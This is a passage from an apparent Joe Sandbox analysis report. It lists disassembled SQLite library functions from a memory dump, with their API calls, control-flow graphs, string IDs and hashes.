                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_errcode.SQLITE3 ref: 61E91AED
                                                                                                              • sqlite3_close.SQLITE3 ref: 61E91AFE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E91B1B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                                              • String ID: @a$@Ua$BINARY$NOCASE$RTRIM$`ta$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$a$Ta$Ta
                                                                                                              • API String ID: 1097977795-2533187458
                                                                                                              • Opcode ID: 14cd9d35746f1733d41ad7436da480a33a77f7c356f942ae2c5745e97ab3b4b0
                                                                                                              • Instruction ID: 82ca588fe3cbcb135a8354ee25c951bac35916a6548e3bc6c60a8b60e82427c9
                                                                                                              • Opcode Fuzzy Hash: 14cd9d35746f1733d41ad7436da480a33a77f7c356f942ae2c5745e97ab3b4b0
                                                                                                              • Instruction Fuzzy Hash: 727205B0A083458FE700DFA5C59574ABBF5BF85358F25CC2CE8998B385D7B9C8458B82
                                                                                                              Function 61E19146 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSystemInfo.KERNEL32(?,?,61EAB400,?,61E18F13,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19160
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19176
                                                                                                                • Part of subcall function 61E190E3: sqlite3_initialize.SQLITE3(?,?,61E1917B), ref: 61E190EE
                                                                                                                • Part of subcall function 61E190E3: sqlite3_mutex_enter.SQLITE3(?,?,61E1917B), ref: 61E19106
                                                                                                                • Part of subcall function 61E190E3: sqlite3_mutex_leave.SQLITE3(?), ref: 61E19138
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E1918A
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E1919E
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E191B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3532963230-0
                                                                                                              • Opcode ID: 282d0988b0c4c7e78b141074b24d0402e11fb334742730bcea6bcf35f9c03c22
                                                                                                              • Instruction ID: 10c7b98b55687f49e46c00f7623be2acc4b57e71823a67b1cc0d3fe22570e2a5
                                                                                                              • Opcode Fuzzy Hash: 282d0988b0c4c7e78b141074b24d0402e11fb334742730bcea6bcf35f9c03c22
                                                                                                              • Instruction Fuzzy Hash: C0F0BDB191C748EBD700AF74C51771ABEE5AF85708F21C82CD0858B294D7B6D8449B93
                                                                                                              Function 61E47732 Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 760stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                              • String ID: -journal$@
                                                                                                              • API String ID: 42632313-41206085
                                                                                                              • Opcode ID: 3255f426f881b5a4d88199e0c4c349b8d64c9bd81d8a6ca3e28b350844d10c37
                                                                                                              • Instruction ID: d477e686d99d46fd763196982faa52e552c98c65023e42cc72f671c95e0e340d
                                                                                                              • Opcode Fuzzy Hash: 3255f426f881b5a4d88199e0c4c349b8d64c9bd81d8a6ca3e28b350844d10c37
                                                                                                              • Instruction Fuzzy Hash: 6882F374A042598FEB20CF68C884B89BBF1BF49308F29C5E9D8489B352D774D985CF91
                                                                                                              Function 61E18CF7 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 392 61e18cf7-61e18d00 393 61e18d06-61e18d18 call 61e08b31 392->393 394 61e19048 392->394 397 61e19041-61e19047 393->397 398 61e18d1e-61e18d44 call 61e01713 sqlite3_mutex_enter 393->398 397->394 401 61e18de1-61e18df2 398->401 402 61e18d4a-61e18d51 398->402 403 61e18e14-61e18e39 sqlite3_mutex_leave sqlite3_mutex_enter 401->403 404 61e18df4-61e18e0a call 61e01713 401->404 405 61e18d53-61e18d62 sqlite3_config 402->405 406 61e18d67-61e18d8d call 61e01713 402->406 408 61e18fe2-61e19007 sqlite3_mutex_leave sqlite3_mutex_enter 403->408 409 61e18e3f-61e18e46 403->409 404->403 416 61e18e0c-61e18e0e 404->416 405->406 418 61e18da4-61e18dae 406->418 419 61e18d8f-61e18d99 406->419 413 61e19020-61e1902d sqlite3_mutex_leave 408->413 414 61e19009-61e19016 sqlite3_mutex_free 408->414 409->408 412 61e18e4c-61e18ea9 call 61e10a25 * 4 409->412 433 61e18eab-61e18ec8 sqlite3_malloc 412->433 434 61e18ecf-61e18ed6 412->434 413->397 414->413 416->403 420 61e1902f 416->420 423 61e18db8-61e18dca 418->423 419->418 422 61e18d9b-61e18da2 419->422 425 61e19034-61e1903f sqlite3_mutex_leave 420->425 422->418 422->423 423->401 428 61e18dcc-61e18ddc 423->428 425->397 428->425 435 61e18f06-61e18f17 sqlite3_free sqlite3_os_init 433->435 436 61e18eca 433->436 437 61e18ed8-61e18ee7 sqlite3_config 434->437 438 61e18eec-61e18efe 434->438 439 61e18fd8 435->439 440 61e18f1d-61e18f24 435->440 436->439 437->438 438->439 444 61e18f04 438->444 439->408 442 61e18f2a-61e18f3d 440->442 443 61e18fce 440->443 445 61e18f46-61e18f48 442->445 446 61e18f3f-61e18f44 442->446 443->439 444->433 447 61e18f4a-61e18f69 445->447 446->447 448 61e18f73-61e18f9a 447->448 449 61e18f6b-61e18f70 447->449 450 61e18f9e-61e18fa5 448->450 449->448 451 61e18fa7-61e18fb4 450->451 452 61e18fb6-61e18fc0 450->452 451->450 453 61e18fc2 452->453 454 61e18fc8 452->454 453->454 454->443
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18E20
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18E2D
                                                                                                              • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18EC1
                                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18EE7
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18F09
                                                                                                              • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18F0E
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18FEA
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18FF5
                                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19011
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19026
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                              • String ID: ya$@va$`"a
                                                                                                              • API String ID: 1590227068-2034376612
                                                                                                              • Opcode ID: 1bcada807b86994f73520025c62b58d360d1fe391b687516e7b23a4db1a4f56e
                                                                                                              • Instruction ID: 890ebe68101173dc46e5b745ce73d43d8d63bd8e5afb6a46cdd49cc9ef25f445
                                                                                                              • Opcode Fuzzy Hash: 1bcada807b86994f73520025c62b58d360d1fe391b687516e7b23a4db1a4f56e
                                                                                                              • Instruction Fuzzy Hash: 5B8162B4A18B098FDB409FA4C455B5A7AF5BB4A318F28C82ED445CB394E779C8C5EB01
                                                                                                              Function 61E3D4D3 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 296fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 455 61e3d4d3-61e3d511 456 61e3d513-61e3d525 call 61e3d1ec 455->456 457 61e3d531-61e3d53e call 61e18735 455->457 462 61e3d907-61e3d910 456->462 463 61e3d52b-61e3d52e 456->463 464 61e3d540-61e3d550 sqlite3_free 457->464 465 61e3d555-61e3d55d 457->465 463->457 464->462 466 61e3d578-61e3d57f sqlite3_win32_is_nt 465->466 467 61e3d55f-61e3d576 465->467 466->467 469 61e3d581-61e3d58e 466->469 468 61e3d5a1-61e3d5be 467->468 472 61e3d590-61e3d59f call 61e185e6 468->472 473 61e3d5c0 468->473 474 61e3d5c3-61e3d5c6 469->474 472->468 480 61e3d5f4-61e3d623 472->480 473->474 476 61e3d5f2 474->476 477 61e3d5c8-61e3d5d0 474->477 476->480 479 61e3d5d2-61e3d5ed sqlite3_free * 2 477->479 477->480 479->462 481 61e3d637-61e3d65b 480->481 482 61e3d625-61e3d633 480->482 483 61e3d66a-61e3d6ab CreateFileW 481->483 484 61e3d65d-61e3d664 sqlite3_win32_is_nt 481->484 482->481 486 61e3d6b1-61e3d6b5 483->486 487 61e3d7bc-61e3d7cc call 61e25f0a 483->487 484->483 485 61e3d72d-61e3d76e 484->485 496 61e3d770 485->496 497 61e3d718-61e3d71c 485->497 488 61e3d6b7-61e3d6f1 call 61e016d8 call 61e25f49 call 61e016e9 486->488 489 61e3d6fd-61e3d70a call 61e185e6 486->489 499 61e3d7d2-61e3d7ec sqlite3_free * 2 487->499 500 61e3d854-61e3d858 487->500 488->489 530 61e3d6f3-61e3d6f7 488->530 489->483 506 61e3d710-61e3d713 489->506 496->487 507 61e3d772-61e3d7ac call 61e016d8 call 61e25f49 call 61e016e9 497->507 508 61e3d71e-61e3d72b call 61e185e6 497->508 501 61e3d820-61e3d848 call 61e254c7 call 61e281da 499->501 502 61e3d7ee-61e3d7f2 499->502 504 61e3d85a-61e3d866 500->504 505 61e3d868-61e3d891 sqlite3_free * 2 500->505 529 61e3d84d-61e3d84f 501->529 502->501 509 61e3d7f4-61e3d81e call 61e3d4d3 502->509 504->505 513 61e3d893 505->513 514 61e3d895-61e3d8a4 505->514 506->487 507->508 534 61e3d7b2-61e3d7b6 507->534 508->485 508->506 509->529 513->514 520 61e3d8a6 514->520 521 61e3d8aa-61e3d8c7 sqlite3_uri_boolean 514->521 520->521 523 61e3d8c9 521->523 524 61e3d8cd-61e3d904 521->524 523->524 524->462 529->462 530->487 530->489 534->487 534->508
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D54B
                                                                                                                • Part of subcall function 61E3D1EC: sqlite3_free.SQLITE3 ref: 61E3D25E
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3D578
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D5DD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D5E8
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3D65D
                                                                                                              • CreateFileW.KERNEL32 ref: 61E3D69D
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D7D8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D7E3
                                                                                                                • Part of subcall function 61E185E6: sqlite3_win32_sleep.SQLITE3 ref: 61E1863E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D877
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D882
                                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3D8C0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                                              • String ID: winOpen
                                                                                                              • API String ID: 1995518269-2556188131
                                                                                                              • Opcode ID: 97b614f013a4bda29f98bb49165e4da93b674d66b617b0f273ff8456119eea12
                                                                                                              • Instruction ID: 4542847a82b68db2e473daaec3db2f18481b53a09b4235cdb7f4be34746d5da9
                                                                                                              • Opcode Fuzzy Hash: 97b614f013a4bda29f98bb49165e4da93b674d66b617b0f273ff8456119eea12
                                                                                                              • Instruction Fuzzy Hash: 5BD1B4749047599FEB10DFA9C58478EBBF0BF84318F208929E8A8DB394E774D945CB41
                                                                                                              Function 61E633D6 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 229COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 535 61e633d6-61e63464 call 61e71dda 538 61e6346a-61e6347e 535->538 539 61e636a9-61e636ad 535->539 542 61e63480-61e63488 538->542 543 61e6348d-61e634a0 call 61e13d7f 538->543 540 61e636af-61e636b6 539->540 541 61e636b8-61e636ba call 61e0a70a 539->541 540->541 544 61e636bf-61e636c9 call 61e1569c 540->544 541->544 546 61e636dd-61e636f1 542->546 551 61e634a2-61e634a6 call 61e408ae 543->551 552 61e634d1-61e634d4 543->552 544->546 556 61e634ab-61e634b6 551->556 554 61e634db-61e634f2 call 61e1409b 552->554 559 61e634f4-61e634f8 554->559 556->552 558 61e634b8-61e634cc call 61e0bf9c call 61e11f90 556->558 575 61e6369b-61e636a7 call 61e0af75 558->575 561 61e63506-61e63513 559->561 562 61e634fa-61e63504 559->562 564 61e63536-61e63540 561->564 565 61e63515-61e63519 561->565 562->561 569 61e63545-61e63555 564->569 567 61e63527-61e63532 565->567 568 61e6351b-61e63525 565->568 571 61e63534 567->571 572 61e6359a-61e635af call 61e11f90 567->572 568->569 573 61e63576-61e63586 569->573 574 61e63557-61e63571 call 61e01dfd call 61e144a7 569->574 571->569 586 61e635b5-61e636d3 call 61e0af75 572->586 587 61e63693-61e63696 call 61e465ad 572->587 576 61e6358c-61e63593 573->576 577 61e63588 573->577 574->573 575->539 575->546 581 61e63595 576->581 582 61e635ba-61e635bd 576->582 577->576 581->572 588 61e635bf-61e635c3 582->588 589 61e635cd-61e63649 call 61e2d237 sqlite3_exec call 61e0f942 582->589 586->539 587->575 588->589 592 61e635c5-61e635c9 588->592 600 61e63655-61e63659 589->600 601 61e6364b-61e63650 call 61e632fc 589->601 592->589 603 61e6365b-61e63667 call 61e156f5 600->603 604 61e63669-61e6366b 600->604 601->600 606 61e63684-61e63688 603->606 604->606 607 61e6366d-61e63680 604->607 606->607 611 61e6368a-61e63691 606->611 609 61e636d5-61e636d8 call 61e0af75 607->609 610 61e63682 607->610 609->546 610->587 611->575 611->587
                                                                                                              Strings
                                                                                                              • sqlite_master, xrefs: 61E633EE
                                                                                                              • sqlite_temp_master, xrefs: 61E633F4
                                                                                                              • unsupported file format, xrefs: 61E63595
                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 61E6352B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                              • API String ID: 0-2834926380
                                                                                                              • Opcode ID: 0b568db154cd19eaffe161a9cadbb8c070451ef4390c34598e7d39c559a80e4b
                                                                                                              • Instruction ID: eef8def05d42d143e2e428f23c2d65052eb7c545d227e98bc7cc05d9ceee79b4
                                                                                                              • Opcode Fuzzy Hash: 0b568db154cd19eaffe161a9cadbb8c070451ef4390c34598e7d39c559a80e4b
                                                                                                              • Instruction Fuzzy Hash: EEA10E70A443888BDB10CFA8C484B8EBBF5AF89318F60C56DD859AB395D775E845CF81
                                                                                                              Function 61E408AE Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 464COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 613 61e408ae-61e408cc call 61e13d7f 616 61e40e71-61e40e75 613->616 617 61e408d2-61e408d4 613->617 618 61e40e87-61e40e8b 616->618 619 61e40e77-61e40e85 616->619 620 61e408d6-61e408da 617->620 621 61e408e0-61e408e6 617->621 622 61e40e97-61e40ea4 618->622 623 61e40e8d-61e40e8f 618->623 619->618 620->616 620->621 624 61e408f5-61e408fb 621->624 625 61e408e8-61e408ee 621->625 622->623 627 61e40ea6-61e40eaa 622->627 626 61e40ebd-61e40ed3 call 61e0af75 623->626 629 61e408fd-61e40906 624->629 630 61e4090e-61e40912 624->630 625->624 628 61e408f0 625->628 627->623 631 61e40eac-61e40eb3 call 61e12ea8 627->631 628->624 629->626 633 61e4090c 629->633 634 61e40914-61e40918 630->634 635 61e4091a-61e4091c 630->635 631->626 633->635 634->635 637 61e4091e-61e40923 634->637 636 61e40925-61e40929 635->636 635->637 641 61e4094e-61e40963 call 61e02894 636->641 642 61e4092b 636->642 640 61e40941-61e40948 637->640 640->626 640->641 641->626 650 61e40969-61e40978 641->650 644 61e4092e-61e40930 642->644 644->641 646 61e40932-61e40936 644->646 648 61e4093c-61e4093f 646->648 649 61e40938-61e4093a 646->649 648->644 649->640 651 61e40981-61e40986 650->651 652 61e4097a-61e4097d 650->652 653 61e40989-61e4098d 651->653 652->651 654 61e40993-61e4099e call 61e3f98c 653->654 655 61e40c3b-61e40c3d 653->655 654->655 663 61e409a4-61e409b5 call 61e02c3f 654->663 657 61e40da6-61e40da8 655->657 658 61e40c43-61e40c47 655->658 661 61e40db3-61e40dbd call 61e3f77e 657->661 662 61e40daa-61e40dac 657->662 658->657 660 61e40c4d-61e40c51 658->660 664 61e40c57-61e40c5e 660->664 665 61e40dae 660->665 666 61e40dc0-61e40dc3 661->666 662->666 676 61e409ba-61e409be 663->676 669 61e40c64-61e40c72 664->669 670 61e40d7b-61e40d81 664->670 665->661 672 61e40dc5-61e40dc9 666->672 673 61e40dea-61e40dec 666->673 677 61e40d97-61e40d9b 669->677 678 61e40c78-61e40c80 669->678 670->661 674 61e40d83-61e40d95 670->674 672->626 679 61e40dcf-61e40ddf call 61e05148 672->679 673->626 675 61e40df2-61e40df6 673->675 674->661 681 61e40e11-61e40e20 675->681 682 61e40df8-61e40dff 675->682 676->655 683 61e409c4-61e409e1 676->683 677->662 680 61e40d9d-61e40da4 call 61e407f6 677->680 684 61e40c86-61e40c8a 678->684 685 61e40d51-61e40d63 call 61e15bb5 678->685 679->653 697 61e40de5 679->697 680->657 689 61e40e25-61e40e29 681->689 690 61e40e22 681->690 682->681 688 61e40e01-61e40e0e 682->688 691 61e40a17-61e40a1a 683->691 692 61e409e3-61e40a15 memcmp 683->692 693 61e40cc6-61e40cd3 684->693 694 61e40c8c-61e40c90 684->694 712 61e40d65-61e40d67 685->712 713 61e40d77-61e40d79 685->713 688->681 700 61e40eb5-61e40eb9 689->700 701 61e40e2f-61e40e40 689->701 690->689 699 61e40a1d-61e40a24 691->699 692->699 693->665 704 61e40cd9-61e40ce9 call 61e0aefd 693->704 694->693 702 61e40c92-61e40ca2 call 61e15bb5 694->702 697->626 706 61e40bae 699->706 707 61e40a2a-61e40a2e 699->707 700->619 711 61e40ebb 700->711 708 61e40e45-61e40e54 701->708 709 61e40e42 701->709 702->670 725 61e40ca8-61e40cc2 call 61e0aedb 702->725 704->670 722 61e40cef-61e40d17 memcmp 704->722 715 61e40bb5-61e40c15 706->715 707->715 716 61e40a34-61e40a54 memcmp 707->716 718 61e40e56-61e40e62 call 61e3e405 708->718 719 61e40e91-61e40e95 708->719 709->708 711->623 712->713 720 61e40d69-61e40d75 call 61e15c04 712->720 713->670 721 61e40d19-61e40d37 713->721 715->653 723 61e40c1a 716->723 724 61e40a5a-61e40a64 716->724 718->626 739 61e40e64-61e40e6f 718->739 719->619 719->622 720->713 721->677 722->721 728 61e40d39-61e40d4f call 61e0af58 722->728 729 61e40c1f-61e40c31 call 61e3f757 723->729 730 61e40a66 724->730 731 61e40a6b-61e40a72 724->731 725->693 728->674 746 61e40c33-61e40c35 729->746 730->731 731->723 738 61e40a78 731->738 742 61e40ab9-61e40adc memcmp 738->742 743 61e40a7a-61e40a7e 738->743 739->719 742->723 745 61e40ae2-61e40b00 742->745 743->742 744 61e40a80-61e40a98 call 61e937c8 743->744 744->729 751 61e40a9e-61e40aa5 744->751 745->723 748 61e40b06-61e40b11 745->748 746->653 746->655 748->723 750 61e40b17-61e40b2e 748->750 752 61e40b30-61e40b5e call 61e3f757 call 61e0b03d call 61e14660 750->752 753 61e40b63-61e40b6f 750->753 751->742 756 61e40aa7-61e40ab4 call 61e3f757 751->756 752->746 754 61e40b71-61e40b77 753->754 755 61e40b8a-61e40b90 753->755 754->755 758 61e40b79-61e40b85 call 61e2666a 754->758 755->723 760 61e40b96-61e40bac 755->760 756->653 758->729 760->715
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
